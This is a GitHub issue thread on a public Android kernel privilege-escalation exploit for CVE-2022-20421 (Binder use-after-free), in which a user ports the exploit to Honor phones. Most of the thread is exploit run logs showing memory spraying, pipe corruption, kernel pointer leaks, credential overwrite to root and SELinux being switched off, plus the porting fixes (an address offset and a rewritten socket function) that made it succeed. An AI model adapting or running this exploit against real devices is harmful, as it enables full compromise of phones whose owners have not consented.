0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License

Failed to adapt the exploit in a new device #12

Closed Securee closed 10 months ago

Securee commented 11 months ago

I want to adapt the exploit to support a new device (not Samsung or Google Pixel): .android_version = 12, .android_security_patch.year = 2022, .android_security_patch.month = 3, .kernel_version = KERNEL_VERSION(5, 4, 134), .kimg_to_lm = pixel_kimg_to_lm, .find_kbase = noop_kbase. The output of uname -a is: Linux localhost 5.4.134-qgki-g27c154db7d6e #1 SMP PREEMPT Fri Mar 25 11:44:48 CST 2022 aarch64

I have tried many times, but it failed with the following output and then the phone panicked:

```text
Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8265:8265] New binder client: A
[8266:8266] New binder client: B
[8267:8267] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Testing ptmx 1 (fd 5)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8320
[pipe_process:8321] Pinned to CPU 0
[pipe_process:8323] Pinned to CPU 2
[pipe_process:8324] Pinned to CPU 3
[pipe_process:8322] Pinned to CPU 1
[pipe_process:8325] Pinned to CPU 4
[pipe_process:8326] Pinned to CPU 5
[pipe_process:8327] Pinned to CPU 6
[pipe_process:8328] Pinned to CPU 7
[fd_master_process] pid = 8329
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8383] 30000 files sprayed
[shaper_process:8385] 30000 files sprayed
[shaper_process:8384] 30000 files sprayed
[shaper_process:8382] 30000 files sprayed
[shaper_process:8381] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8386
[timer_master_process] Wait for C to enter spin_lock()
[8387:8387] New binder client: A
[8389:8389] New binder client: C
[8388:8388] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.....................................!............
[x] Failed.

[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 8417
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8473] 30000 files sprayed
[shaper_process:8469] 30000 files sprayed
[shaper_process:8470] 30000 files sprayed
[shaper_process:8472] 30000 files sprayed
[shaper_process:8471] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8474
[timer_master_process] Wait for C to enter spin_lock()
[8476:8476] New binder client: B
[8480:8480] New binder client: C
[8475:8475] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
B: Searching for magic badcab1ebadcab1e....
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.................................*................
```

The panic info is: `mReason: PANIC sReason:page_request info: PC filp_close+0x28/0xbc`

And I have tried changing NR_EPFDS from 500 to 200, but it failed with the same error. BTW, it seems to crash randomly.

Securee commented 10 months ago

If I use another kernel, 5.10.66, on the same device, it gives me the following error:

```text
Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[6951:6951] New binder client: A
[6952:6952] New binder client: B
[6953:6953] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
C: Wait for A...
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7358
[pipe_process:7359] Pinned to CPU 0
[pipe_process:7361] Pinned to CPU 2
[pipe_process:7364] Pinned to CPU 5
[pipe_process:7365] Pinned to CPU 6
[pipe_process:7363] Pinned to CPU 4
[pipe_process:7362] Pinned to CPU 3
[pipe_process:7360] Pinned to CPU 1
[pipe_process:7366] Pinned to CPU 7
[fd_master_process] pid = 7367
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7441] 30000 files sprayed
[shaper_process:7439] 30000 files sprayed
[shaper_process:7440] 30000 files sprayed
[shaper_process:7438] 30000 files sprayed
[shaper_process:7437] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7463
[timer_master_process] Wait for C to enter spin_lock()
[7466:7466] New binder client: C
[7465:7465] New binder client: B
[7464:7464] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[x] Success.

[x] send_dup_done done.

[x] usleep 25s done.

[x] write ipe_sockets done.

[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
shaper process pid = 7437
shaper process pid = 7438
shaper process pid = 7439
shaper process pid = 7440
shaper process pid = 7441
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
Error: failed to find corrupted pipe
[fd_master_process] pid = 7528
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7581] 30000 files sprayed
[shaper_process:7583] 30000 files sprayed
[shaper_process:7584] 30000 files sprayed
[shaper_process:7580] 30000 files sprayed
[shaper_process:7582] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7596
[timer_master_process] Wait for C to enter spin_lock()
[7597:7597] New binder client: A
[7607:7607] New binder client: C
[7599:7599] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
monitor_thread_a: Waiting for death notification
B: Destroying
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
(crash)
```

It seems to fail to find the corrupted pipe.

0xkol commented 10 months ago

Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue https://github.com/0xkol/badspin/issues/1

Which device is it?

Securee commented 10 months ago

> Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue #1
>
> Which device is it?

The first log is from an Honor Magic3 with kernel 5.4 and the second log is from a Magic4 with kernel 5.10.66. I know I may need to make some changes to kimg_to_lm and find_kbase, but it doesn't seem to have gotten that far yet.

And by printing the log, ret = 0x00001000 when reading pipe tmp_pipe[0] with FIONREAD in the code: `SYSCHK(ioctl(tmp_pipe[0], FIONREAD, &ret));`

0xkol commented 10 months ago

Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.

I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.

Securee commented 10 months ago

> Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.
>
> I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.

Thank you anyway, I will try to resolve the issue myself first.

Securee commented 10 months ago

@0xkol, now I can read the pipe correctly.

```text
Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8833:8833] New binder client: A
[8835:8835] New binder client: C
[8834:8834] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 5)
Reading ptmx 0
Testing ptmx 1 (fd 6)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8890
[pipe_process:8891] Pinned to CPU 0
[pipe_process:8892] Pinned to CPU 1
[pipe_process:8893] Pinned to CPU 2
[pipe_process:8894] Pinned to CPU 3
[pipe_process:8897] Pinned to CPU 6
[pipe_process:8895] Pinned to CPU 4
[pipe_process:8896] Pinned to CPU 5
[pipe_process:8898] Pinned to CPU 7
[fd_master_process] pid = 8899
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8952] 30000 files sprayed
[shaper_process:8951] 30000 files sprayed
[shaper_process:8953] 30000 files sprayed
[shaper_process:8954] 30000 files sprayed
[shaper_process:8955] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8957
[timer_master_process] Wait for C to enter spin_lock()
[8960:8960] New binder client: C
[8959:8959] New binder client: B
[8958:8958] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414143c4
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffebc953c768
[x] Leaked pipe buffer page : ffffffff1fd16780
[+]Begin to find_kallsyms.
[__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000
[__pipe_kread] Try to read pipe after write_fake_pipe_buffer
(crash)
```

Securee commented 10 months ago

I rebooted the device repeatedly, and the lines `a8000000-aa6affff : Kernel code` and `aa9b0000-aacbffff : Kernel data` from `cat /proc/iomem` are the same every time. So I think there is no physical KASLR on my device. Right? If yes, then the kimg_to_lm I use (pixel_kimg_to_lm) is correct, and the rest is the find_kbase function, which I may need to modify. But how can I judge whether I need to modify it or not?
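The check done by hand in the comment above, written out as a script: it parses the kernel image ranges from /proc/iomem snapshots taken on different boots and reports whether the physical load address of the kernel text moved (i.e. whether physical KASLR is in effect). This is an added example and not part of the badspin project; the iomem snapshots are constructed from the ranges quoted above, and the region names are assumed to be the ones an arm64 kernel prints.

```python
"""Compare the kernel image's physical ranges from /proc/iomem across boots.

Added example (not badspin code). The snapshots below are constructed from
the "Kernel code" / "Kernel data" ranges quoted in the issue; the other
values are made-up filler.
"""
import re
from typing import Dict, Iterable, Tuple

# Matches "start-end : name", with or without the indentation /proc/iomem
# uses for nested resources, e.g. "  a8000000-aa6affff : Kernel code".
_RANGE_RE = re.compile(r"^\s*([0-9a-fA-F]+)-([0-9a-fA-F]+)\s*:\s*(.+?)\s*$")

# Resource names an arm64 kernel registers for its own image (assumed set;
# older kernels print only "Kernel code" and "Kernel data").
KERNEL_REGIONS = ("Kernel code", "Kernel rodata", "Kernel data", "Kernel bss")


def parse_iomem(text: str) -> Dict[str, Tuple[int, int]]:
    """Return {region name: (start, end)} for the kernel image regions only."""
    regions: Dict[str, Tuple[int, int]] = {}
    for line in text.splitlines():
        m = _RANGE_RE.match(line)
        if m and m.group(3) in KERNEL_REGIONS:
            regions[m.group(3)] = (int(m.group(1), 16), int(m.group(2), 16))
    return regions


def kernel_code_base(text: str) -> int:
    """Physical start of the kernel text, or -1 if the snapshot lacks it
    (unprivileged readers see zeroed addresses on recent kernels)."""
    start, _ = parse_iomem(text).get("Kernel code", (-1, -1))
    return -1 if start <= 0 else start


def physical_kaslr_active(snapshots: Iterable[str]) -> bool:
    """True if the kernel text base differs between at least two boots."""
    bases = {kernel_code_base(s) for s in snapshots}
    bases.discard(-1)  # ignore snapshots that were unreadable
    return len(bases) > 1


# Constructed snapshots: two boots of a device whose kernel is loaded at a
# fixed physical address (the case described in the issue), plus one where
# the base moved, to show what a randomized layout would look like.
BOOT_1 = """\
80000000-bfffffff : System RAM
  a8000000-aa6affff : Kernel code
  aa6b0000-aa9affff : reserved
  aa9b0000-aacbffff : Kernel data
"""
BOOT_2 = BOOT_1  # identical after reboot, as reported in the issue
BOOT_MOVED = BOOT_1.replace("a8000000-aa6affff", "b0000000-b26affff")
BOOT_UNPRIVILEGED = "00000000-00000000 : Kernel code\n"  # zeroed addresses


if __name__ == "__main__":
    print("kernel text base:", hex(kernel_code_base(BOOT_1)))
    print("fixed load address across boots:",
          not physical_kaslr_active([BOOT_1, BOOT_2]))
    print("randomized load address detected:",
          physical_kaslr_active([BOOT_1, BOOT_MOVED]))
```

Take the snapshots as root (for example over adb), since non-privileged readers of /proc/iomem get zeroed addresses on recent kernels and the script then reports the snapshot as unreadable.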

Securee commented 10 months ago

From the debug log, it seems to crash at: find_kallsyms --> rw->kread --> pipe_kread --> __pipe_kread with kaddr = ffffff8000000000, page = fffffffeffe00000. PAGE_OFFSET=0xffffff8000000000UL and VMEMMAP_START=0xfffffffeffe00000UL.

0xkol commented 10 months ago

Maybe you should add the offset 0x28000000

Securee commented 10 months ago

@0xkol You are right. After I added 0x28000000 to kimg_to_lm, it seems to go ahead:

```text
Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[7533:7533] New binder client: A
[7535:7535] New binder client: C
[7534:7534] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7999
[pipe_process:8000] Pinned to CPU 0
[pipe_process:8002] Pinned to CPU 2
[pipe_process:8003] Pinned to CPU 3
[pipe_process:8004] Pinned to CPU 4
[pipe_process:8001] Pinned to CPU 1
[pipe_process:8006] Pinned to CPU 6
[pipe_process:8005] Pinned to CPU 5
[pipe_process:8007] Pinned to CPU 7
[fd_master_process] pid = 8008
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8083] 30000 files sprayed
[shaper_process:8082] 30000 files sprayed
[shaper_process:8075] 30000 files sprayed
[shaper_process:8074] 30000 files sprayed
[shaper_process:8080] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8112
[timer_master_process] Wait for C to enter spin_lock()
[8113:8113] New binder client: A
[8114:8114] New binder client: B
[8115:8115] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction.
BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................*...............
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414144f5
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffd98753c768
[x] Leaked pipe buffer page : ffffffff2042fc80
kallsyms_token_table file offset 0x2213b20
kallsyms_token_index file offset 0x2213ed0
kallsyms_markers file offset 0x22132b0
kallsyms_num_syms (approx) 0x21b00
kallsyms_num_syms (exact) 0x21a4d
kallsyms_relative_base 0xffffffd985200000
kallsyms_names file offset 0x20313b8
kallsyms_offsets file offset 0x1faaa70
[x] kallsyms found successfully!
[x] Kernel base: ffffffd985200000
[x] Found init_task: ffffffd987bcbe40
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff882959b780
[pipe_close] Found task struct: ffffff802316dc80
file->private_data offset: 216
Candidate write_buf offset: 752 (ffffff8023050000)
Switched to UAO-based read/write primitive
[x] Successfully upgraded to stable RW primitives. \o/
Fixup zombie processes
Fixup pid = 7999
Found files struct: ffffff87a320bc80
Now killing pid 7999

[x] Success!
Time to root
Finding init cred
init task_struct = ffffff878041a500
init cred = ffffff87a023f180 (usage 3)
Switch 8545:-1 to new creds (ffffff87a023f180)
task_struct (8545:-1) = ffffff882959ca00
cred = ffffff879e8da600
Change cred and real_cred
Done
Setting selinux_state->enforce to 0
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80
cred = ffffff8791576600
Change cred and real_cred
Done
[x] Reading live selinux policy
[x] New selinux policy loaded
Switch 7529:7529 to new creds (ffffff8791576600)
task_struct (7529:7529) = ffffff802316dc80
cred = ffffff87a023f180
Change cred and real_cred
Done
Setting selinux_state->enforce to 1
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80
cred = ffffff8791576600
Change cred and real_cred
Done
escalate exit status = 0
Reset process state
Could not open socket connection
```

(The call to socket seems to fail with errno=11 "try again". With netstat -ltw I can't find a listening port 1337, so the connect failed.)

It seems that we are only one step away from final success.

Securee commented 10 months ago

Finally, I resolved the socket problem by modifying the connect_to function:

```c
/* Modified connect_to(): instead of connecting out to ip:port, bind a
 * listening socket on INADDR_ANY:port and return the first accepted client.
 * The ip parameter is kept so the existing call sites compile, but it is
 * no longer used. LOG() is the project's logging macro. */
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int connect_to(const char *ip, int port) {
    (void)ip;  /* listening side: the peer address is not needed */
    int sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        return -1;

    struct sockaddr_in addr, cliAddr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((uint16_t)port);
    addr.sin_addr.s_addr = INADDR_ANY;

    /* bind()/listen() failures were silently ignored before */
    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
        listen(sockfd, 5) < 0) {
        close(sockfd);
        return -1;
    }
    LOG("[%s] waiting to connect to the socket......\n", __func__);

    socklen_t len = sizeof(cliAddr);  /* accept() takes socklen_t, not int */
    int clientfd = accept(sockfd, (struct sockaddr *)&cliAddr, &len);
    LOG("[%s] client connect to the socket\n", __func__);
    close(sockfd);  /* the listening socket is not needed once a client is accepted */
    return clientfd;
}
```

Securee commented 10 months ago


Thank you very much for your help, @0xkol.

diabl0w commented 5 months ago

> @0xkol, now I can read the pipe correctly.
>
> ```text
> Bad Spin Exploit (CVE-2022-20421) by 0xkol
>
> [x] Looking for binder_proc's inner_lock offset
> [x] Trigger vulnerability... (mode = 1)
> [8833:8833] New binder client: A
> [8835:8835] New binder client: C
> [8834:8834] New binder client: B
> A: lookup B => handle = 2
> C: lookup A => handle = 2
> A: Waiting for strong nodes...
> A: 1 references accepted
> A: Sending 1 strong handles to B
> C: Wait for A...
> B: Searching for magic badcab1ebadcab1e....
> Txn size: 1023.562500KB
> B: Destroying
> B: Finish.
> monitor_thread_a: Waiting for death notification
> monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
> monitor_thread_a: Done
> A: Done sending transaction.
> BR_FAILED_REPLY
> poc_a_wait_for_c_death: Waiting for C death notification
> [x] Trigger use-after-free
> Testing ptmx 0 (fd 5)
> Reading ptmx 0
> Testing ptmx 1 (fd 6)
> Reading ptmx 1
> Freeing ptmx...
> poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
> [x] Finish spinning at spin_lock()
> Joining blocker threads...
> All blocker threads joined.
> offsetof(inner_lock, binder_proc) = 576
> [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
>
> [graveyard_process] pid = 8890
> [pipe_process:8891] Pinned to CPU 0
> [pipe_process:8892] Pinned to CPU 1
> [pipe_process:8893] Pinned to CPU 2
> [pipe_process:8894] Pinned to CPU 3
> [pipe_process:8897] Pinned to CPU 6
> [pipe_process:8895] Pinned to CPU 4
> [pipe_process:8896] Pinned to CPU 5
> [pipe_process:8898] Pinned to CPU 7
> [fd_master_process] pid = 8899
> [fd_master_process] Creating dup process spawner
> [fd_master_process] Creating 50 dup processes
> [fd_master_process] Setup 8 pipe processes
> [x] Shaping physical memory
> [fd_master_process] Creating 5 shapers
> [fd_master_process] Waiting for shapers...
> [shaper_process:8952] 30000 files sprayed
> [shaper_process:8951] 30000 files sprayed
> [shaper_process:8953] 30000 files sprayed
> [shaper_process:8954] 30000 files sprayed
> [shaper_process:8955] 30000 files sprayed
> [fd_master_process] Shapers done.
> [fd_master_process] Wait for all dup processes to finish
> [x] Trigger vulnerability... (mode = 3)
> [timer_master_process] pid=8957
> [timer_master_process] Wait for C to enter spin_lock()
> [8960:8960] New binder client: C
> [8959:8959] New binder client: B
> [8958:8958] New binder client: A
> C: lookup A => handle = 2
> A: lookup B => handle = 2
> A: Waiting for strong nodes...
> B: Searching for magic badcab1ebadcab1e....
> A: 1 references accepted
> A: Sending 1 strong handles to B
> C: Wait for A...
> Txn size: 1023.562500KB
> B: Destroying
> B: Finish.
> monitor_thread_a: Waiting for death notification
> monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
> monitor_thread_a: Done
> A: Done sending transaction.
> BR_FAILED_REPLY
> poc_a_wait_for_c_death: Waiting for C death notification
> [x] Trigger use-after-free
> [x] Waiting for timer threads
> [timer_master_process] Done.
> poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
> [x] Finish spinning at spin_lock()
> ...............*..................................
> [fd_master_process] Received 512 pipes
> [cleanup_fd_master] Cleanup zombie processes
> Cleanup dup processes
> Done.
> Cleanup shapers
> Done.
> Cleanup spawner
> Cleanup done.
> [x] Trying to escalate...
> Write page to every pipe
> Identifying pipe
> [identify_pipe] Found corrupted pipe! ret = 414143c4
> Closing unneeded ptmxs
> Closing unneeded pipes
> [x] Found corrupted ptmx and pipe.
> [fd_master_process] Done.
> [x] Leaking pipe buffer...
> [leak_pipe_buffer] Write to the pipe
> [leaker_thread] Wrote 1024 bytes to ptmx
> [leak_pipe_buffer] Try read 1024 bytes from ptmx
> [x] Leaked pipe buffer oprerations: ffffffebc953c768
> [x] Leaked pipe buffer page : ffffffff1fd16780
> [+]Begin to find_kallsyms.
> [__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000
> [__pipe_kread] Try to read pipe after write_fake_pipe_buffer
> (crash)
> ```

@Securee could you tell me what steps were necessary to get the pipe to be read?